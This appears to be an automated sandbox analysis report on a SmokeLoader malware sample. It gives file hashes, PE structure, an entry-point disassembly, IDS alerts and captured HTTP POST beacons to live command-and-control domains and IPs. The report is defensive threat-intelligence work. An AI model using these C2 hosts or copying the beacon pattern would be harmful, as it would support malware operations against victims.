                                                                                                                C:\Users\user\AppData\Roaming\jtruajj3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Roaming\jtruajj

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):222720
                                                                                                                  Entropy (8bit):6.497652873737398
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                  MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                  SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                  SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                  SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: 3388.PDF.hta, Detection: malicious, Browse
                                                                                                                  Reputation:low
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie.....................d....................@.........................................................................D...P....P.....................................................X........................................................text....~.......................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........@......................@....rsrc.......P......................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\jtruajj:Zone.Identifier

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):6.497652873737398
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                  • InstallShield setup (43055/19) 0.43%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:RmbF3635xY.exe
                                                                                                                  File size:222'720 bytes
                                                                                                                  MD5:31059e7394b880f017e83804d9b716ab
                                                                                                                  SHA1:2c0057c276d7d2020d1e5a60ca6d44e2fb91674e
                                                                                                                  SHA256:f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1
                                                                                                                  SHA512:a31e40888fc80ce8e138833155a63eddc7ea9d4a37bceb95a46e2ce937e42dfc74df34fc9869f95940ee0f73d00f3a72839f220f09499b4f28aa1b91e5b706f9
                                                                                                                  SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                  TLSH:CF244911B9E59025EEF75B75197486942E7BBCF2AA30804E3290321F9E733D36962723
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie...

                                                                                                                  File Icon

                                                                                                                  Icon Hash:03a1879b9b6565d6

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x401716
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6549601E [Mon Nov 6 21:52:30 2023 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:7529a394fc2aae97d1d4dcd49f0468b5

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F2EE87B8DCCh
                                                                                                                  jmp 00007F2EE87B4EEEh
                                                                                                                  mov edi, edi
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000328h
                                                                                                                  mov dword ptr [0041D888h], eax
                                                                                                                  mov dword ptr [0041D884h], ecx
                                                                                                                  mov dword ptr [0041D880h], edx
                                                                                                                  mov dword ptr [0041D87Ch], ebx
                                                                                                                  mov dword ptr [0041D878h], esi
                                                                                                                  mov dword ptr [0041D874h], edi
                                                                                                                  mov word ptr [0041D8A0h], ss
                                                                                                                  mov word ptr [0041D894h], cs
                                                                                                                  mov word ptr [0041D870h], ds
                                                                                                                  mov word ptr [0041D86Ch], es
                                                                                                                  mov word ptr [0041D868h], fs
                                                                                                                  mov word ptr [0041D864h], gs
                                                                                                                  pushfd
                                                                                                                  pop dword ptr [0041D898h]
                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                  mov dword ptr [0041D88Ch], eax
                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                  mov dword ptr [0041D890h], eax
                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                  mov dword ptr [0041D89Ch], eax
                                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                                  mov dword ptr [0041D7D8h], 00010001h
                                                                                                                  mov eax, dword ptr [0041D890h]
                                                                                                                  mov dword ptr [0041D78Ch], eax
                                                                                                                  mov dword ptr [0041D780h], C0000409h
                                                                                                                  mov dword ptr [0041D784h], 00000001h
                                                                                                                  mov eax, dword ptr [0041C008h]
                                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                                  mov eax, dword ptr [0041C00Ch]
                                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                                  call dword ptr [000000D4h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                  • [LNK] VS2008 build 21022

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1a7440x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1150000x1a1e0.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1a4580x18.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x184.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x17edf0x18000574a29c67171712a5ff2381296a30babFalse0.7909444173177084data7.486630625699931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x190000x20220x2200681a31faacd60791d3dfc5b6676241abFalse0.35592830882352944data5.421584991551131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x1c0000xf7ff80x18008866369ebf07e3343622354c6c1cc052False0.2591145833333333data2.6775651395317706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .tls0x1140000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x1150000x1a1e00x1a200c9c1cc244b5a96be47b6bccc7c1df270False0.4988598983253589data5.462891080418723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  AFX_DIALOG_LAYOUT0x127d080x2data5.0
                                                                                                                  ROCOCUPACOZODACAJAJ0x126d100xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6010447273914463
                                                                                                                  SUZIZOXALIDEVODUGIDUVOJAPIPUCOFA0x1279080x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6267190569744597
                                                                                                                  RT_CURSOR0x127d100x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                  RT_CURSOR0x127e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                  RT_ICON0x115a200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5748933901918977
                                                                                                                  RT_ICON0x1168c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6484657039711191
                                                                                                                  RT_ICON0x1171700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6981566820276498
                                                                                                                  RT_ICON0x1178380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7536127167630058
                                                                                                                  RT_ICON0x117da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5244813278008299
                                                                                                                  RT_ICON0x11a3480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6282833020637899
                                                                                                                  RT_ICON0x11b3f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6409836065573771
                                                                                                                  RT_ICON0x11bd780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.774822695035461
                                                                                                                  RT_ICON0x11c2580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39712153518123666
                                                                                                                  RT_ICON0x11d1000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5613718411552346
                                                                                                                  RT_ICON0x11d9a80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6244239631336406
                                                                                                                  RT_ICON0x11e0700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                                                                  RT_ICON0x11e5d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4448874296435272
                                                                                                                  RT_ICON0x11f6800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4364754098360656
                                                                                                                  RT_ICON0x1200080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.48404255319148937
                                                                                                                  RT_ICON0x1204d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5655650319829424
                                                                                                                  RT_ICON0x1213800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6128158844765343
                                                                                                                  RT_ICON0x121c280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.4769585253456221
                                                                                                                  RT_ICON0x1222f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5953757225433526
                                                                                                                  RT_ICON0x1228580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5773858921161825
                                                                                                                  RT_ICON0x124e000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6437617260787992
                                                                                                                  RT_ICON0x125ea80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6323770491803279
                                                                                                                  RT_ICON0x1268300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7056737588652482
                                                                                                                  RT_STRING0x12a5b80x424data0.44622641509433963
                                                                                                                  RT_STRING0x12a9e00x6c4data0.4255196304849885
                                                                                                                  RT_STRING0x12b0a80x620data0.4406887755102041
                                                                                                                  RT_STRING0x12b6c80x514data0.4576923076923077
                                                                                                                  RT_STRING0x12bbe00x660data0.4375
                                                                                                                  RT_STRING0x12c2400x66edata0.4307411907654921
                                                                                                                  RT_STRING0x12c8b00x7b2data0.42233502538071066
                                                                                                                  RT_STRING0x12d0680x7e6data0.42037586547972305
                                                                                                                  RT_STRING0x12d8500x5f4data0.4416010498687664
                                                                                                                  RT_STRING0x12de480x6d0data0.4288990825688073
                                                                                                                  RT_STRING0x12e5180x790data0.42613636363636365
                                                                                                                  RT_STRING0x12eca80x464data0.45462633451957296
                                                                                                                  RT_STRING0x12f1100xccdata0.5490196078431373
                                                                                                                  RT_GROUP_CURSOR0x12a3e80x22data1.088235294117647
                                                                                                                  RT_GROUP_ICON0x126c980x76dataTurkishTurkey0.6694915254237288
                                                                                                                  RT_GROUP_ICON0x11c1e00x76dataTurkishTurkey0.6610169491525424
                                                                                                                  RT_GROUP_ICON0x1204700x68dataTurkishTurkey0.7115384615384616
                                                                                                                  RT_VERSION0x12a4100x1a8data0.5825471698113207

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllSetPriorityClass, GetConsoleAliasesLengthW, CopyFileExW, GetNumaProcessorNode, ReadConsoleA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, SetCommState, GetCommandLineA, GlobalAlloc, GetVolumeInformationA, CopyFileW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, GetFileAttributesA, HeapCreate, SetConsoleMode, GetBinaryTypeA, SearchPathW, GetLastError, GetProcAddress, GetLongPathNameA, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, QueryDosDeviceW, FindAtomA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, GetStdHandle, GetComputerNameA, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                                                                                                  USER32.dllGetFocus
                                                                                                                  ADVAPI32.dllObjectPrivilegeAuditAlarmW

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  TurkishTurkey

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-10-04T15:10:05.191461+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949710193.46.217.7880TCP
                                                                                                                  2024-10-04T15:10:06.535004+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949711188.40.141.21180TCP
                                                                                                                  2024-10-04T15:10:06.922982+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949711188.40.141.21180TCP
                                                                                                                  2024-10-04T15:10:32.226080+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949713193.46.217.7880TCP
                                                                                                                  2024-10-04T15:10:32.432388+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949711188.40.141.21180TCP
                                                                                                                  2024-10-04T15:10:32.829421+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.949711188.40.141.21180TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 4, 2024 15:10:04.259187937 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:04.269984961 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:04.270087004 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:04.270289898 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:04.270308018 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:04.280179024 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:04.283152103 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.190660000 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.191396952 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.191461086 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:05.275589943 CEST4971080192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:05.280560970 CEST8049710193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.880999088 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:05.885906935 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.886143923 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:05.886143923 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:05.886300087 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:05.891274929 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.891285896 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:06.529943943 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:06.535003901 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:06.535003901 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:06.543158054 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:06.544327021 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:06.871114016 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:06.922981977 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:31.200464010 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:31.210211992 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:31.210988998 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:31.217560053 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:31.217560053 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:31.228225946 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:31.228241920 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.225739956 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.226079941 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:32.226176977 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.226233006 CEST4971380192.168.2.9193.46.217.78
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:32.235580921 CEST8049713193.46.217.78192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.238871098 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.238882065 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.427405119 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST4971180192.168.2.9188.40.141.211
                                                                                                                  Oct 4, 2024 15:10:32.437237978 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.437283993 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.774131060 CEST8049711188.40.141.211192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:32.829421043 CEST4971180192.168.2.9188.40.141.211

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 4, 2024 15:10:03.960601091 CEST6227253192.168.2.91.1.1.1
                                                                                                                  Oct 4, 2024 15:10:04.257939100 CEST53622721.1.1.1192.168.2.9
                                                                                                                  Oct 4, 2024 15:10:05.278145075 CEST6523353192.168.2.91.1.1.1
                                                                                                                  Oct 4, 2024 15:10:05.880098104 CEST53652331.1.1.1192.168.2.9

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 4, 2024 15:10:03.960601091 CEST192.168.2.91.1.1.10x8372Standard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                                                                                                                  Oct 4, 2024 15:10:05.278145075 CEST192.168.2.91.1.1.10x5836Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 4, 2024 15:10:04.257939100 CEST1.1.1.1192.168.2.90x8372No error (0)unicexpertmagazine.pw193.46.217.78A (IP address)IN (0x0001)false
                                                                                                                  Oct 4, 2024 15:10:05.880098104 CEST1.1.1.1192.168.2.90x5836No error (0)ceoconstractionstore.pl188.40.141.211A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • gtatfotvrgw.org
                                                                                                                    • unicexpertmagazine.pw
                                                                                                                  • duiiukhvfawcnf.org
                                                                                                                    • ceoconstractionstore.pl
                                                                                                                  • trpngknppeg.com
                                                                                                                  • xtihbxaqoab.com
                                                                                                                  • rljealjxpbaxswq.net
                                                                                                                  • qburaxgwiulsnc.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.949710193.46.217.78803504C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 4, 2024 15:10:04.270289898 CEST286OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://gtatfotvrgw.org/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 250
                                                                                                                  Host: unicexpertmagazine.pw
                                                                                                                  Oct 4, 2024 15:10:04.270308018 CEST250OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e2 28 60 c8
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)(`;v(IU'5@48BG);P5ZQ\^`q&bCCv~r.]`N+}-=<-fgULi@Ca)qel"aqr:rg?OY2
                                                                                                                  Oct 4, 2024 15:10:05.190660000 CEST602INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:05 GMT
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                  Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.949711188.40.141.211803504C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 4, 2024 15:10:05.886143923 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://duiiukhvfawcnf.org/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 173
                                                                                                                  Host: ceoconstractionstore.pl
